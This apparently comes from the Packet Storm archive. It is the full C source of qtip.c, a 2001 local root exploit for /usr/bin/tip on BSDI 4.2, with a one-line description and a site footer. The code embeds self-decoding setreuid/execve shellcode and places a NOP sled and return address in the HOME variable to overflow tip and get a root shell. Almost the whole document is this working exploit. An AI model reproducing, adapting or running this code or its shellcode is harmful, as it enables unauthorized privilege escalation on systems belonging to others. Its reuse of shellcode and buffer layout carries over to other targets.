Hhp-qtip.c is a local root exploit for /usr/bin/tip on BSDI 4.2. Requires access to tip, usually gid(dialer).
68b298f994c8c477f0f7455e566dc8f16aa96901ae020b249e0593c73d2ca8d6/* !DO NOT DISTRIBUTE! !HHP PRIVATE SOURCE ONLY!
*
* qtip.c :: (BSDI 4.2) /usr/bin/tip local root exploit.
*
* Author: Cody Tubbs (loophole of hhp).
* Site: http://www.hhp-programming.net/
* Email: pigspigs@yahoo.com
* Date: 6/15/2001. 2:12:54AM CST.
*
* Requires access to tip, usualy gid(dialer).
* ps... sup tip? submitted by tarsin (robbie gubler)
* or something of the like.
*/
#include <stdio.h>
#define OSET -288 //Worked for me...
static char shellcode[]= //BSDI self-decoding execve-setreuid shellcode.
"\xeb\x0c\x5e\x31\xc9\xb1\x27\xfe\x0e\x46\xe2\xfb\xeb\x05\xe8\xef\xff"
"\xff\xff\x32\xc1\x52\x52\xb1\x7f\xe9\x15\x01\x01\x01\x69\x30\x30\x74"
"\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x52\x54\x52\x55\x54\x51\xb1\x3c\x9b"
"\x01\x01\x01\x01\x08\x01\xc4"; //...... Author: bighawk[@warfare.com]
long get_sp(void){__asm__("movl %esp,%eax");}
int main(int argc, char **v){
char eip[268];
int cont, i;
long retaddr, oset=0;
fprintf(stderr,"(BSDI 4.2) /usr/bin/tip local root exploit.\n");
if(argc>1){oset=atoi(v[1]);}else{oset=OSET;}
retaddr=get_sp()+oset;
fprintf(stderr,"Ret-addr %#x, offset: %d, align: 0.\n",retaddr,oset);
memset(eip,0x90,sizeof(eip));
memcpy(eip+162,shellcode,strlen(shellcode));
for(i=224;i<268;i+=4){*(long *)&eip[i]=retaddr;}
setenv("HOME",eip,1);
execl("/usr/bin/tip","tip","0",0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed